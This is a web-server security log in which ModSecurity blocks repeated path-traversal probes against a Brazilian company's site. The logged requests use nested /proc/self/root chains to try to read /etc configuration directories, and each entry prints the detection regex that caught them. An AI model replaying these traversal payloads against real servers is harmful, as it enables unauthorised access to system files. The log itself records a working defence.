[Mon Mar 16 19:08:54.780568 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:51470] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/opt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_dtSswJuvopo3lOiD3QAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:08:59.336409 2026] [:error] [pid 10831:tid 140411699963648] [client 74.7.241.46:51478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_e46lpbStxTqkSkuMOgAAAkU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:00.622293 2026] [:error] [pid 14895:tid 140411624429312] [client 74.7.241.46:49954] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_fFajLEzk2WiQ-101swAAAo4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:01.783800 2026] [:error] [pid 10651:tid 140411716749056] [client 74.7.241.46:49970] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_fbysWC90G-1nBrBo7QAAAYM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:03.121924 2026] [:error] [pid 10651:tid 140411649607424] [client 74.7.241.46:49972] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_f7ysWC90G-1nBrBo7gAAAYs"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:05.384518 2026] [:error] [pid 10651:tid 140411557287680] [client 74.7.241.46:49982] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_gbysWC90G-1nBrBo9QAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:06.673085 2026] [:error] [pid 14895:tid 140411741927168] [client 74.7.241.46:49996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_glajLEzk2WiQ-101tAAAAoA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:14.942250 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.241.46:50010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_iqTCbgAP5jq5TehN-gAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:16.246958 2026] [:error] [pid 29802:tid 140411624429312] [client 74.7.241.46:49996] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_jM_BxrYCr4hPDw8N0AAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:18.526987 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:50010] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_jrABkC4fWIHEf8EcagAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:24.419024 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.241.46:42250] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_lKQpVkWug9HeOt9W7QAAA1g"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:27.124596 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.241.46:42258] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_lY6lpbStxTqkSkuMPwAAAlg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:30.556443 2026] [:error] [pid 29507:tid 140411725141760] [client 74.7.241.46:44556] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_mkr9dMAiw-8KANNsKgAAAQI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:09:38.665082 2026] [:error] [pid 15568:tid 140411574073088] [client 74.7.241.46:44568] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_oqQpVkWug9HeOt9W_wAAA1Q"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:10:02.607918 2026] [:error] [pid 29507:tid 140411599251200] [client 74.7.241.46:41806] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_ukr9dMAiw-8KANNsRQAAARE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:10:05.039960 2026] [:error] [pid 14895:tid 140411725141760] [client 74.7.241.46:41876] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/pm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_vVajLEzk2WiQ-101zgAAAoI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 19:10:06.938041 2026] [:error] [pid 15061:tid 140411540502272] [client 74.7.244.31:46272] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh_vqTCbgAP5jq5TehOCAAAAtg"]
[Mon Mar 16 19:10:22.021215 2026] [:error] [pid 21806:tid 140411725141760] [client 74.7.243.203:48862] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_ztSswJuvopo3lOiENwAAAII"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 19:10:37.931997 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.241.46:41888] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_3bysWC90G-1nBrBpKwAAAYA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:10:44.643320 2026] [:error] [pid 21805:tid 140411741927168] [client 74.7.241.46:55490] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_5LABkC4fWIHEf8EclQAAAEA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:10:47.053979 2026] [:error] [pid 10831:tid 140411725141760] [client 74.7.241.46:55506] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_546lpbStxTqkSkuMYQAAAkI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 19:10:57.057627 2026] [:error] [pid 10831:tid 140411716749056] [client 74.7.241.46:36636] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh_8Y6lpbStxTqkSkuMbAAAAkM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
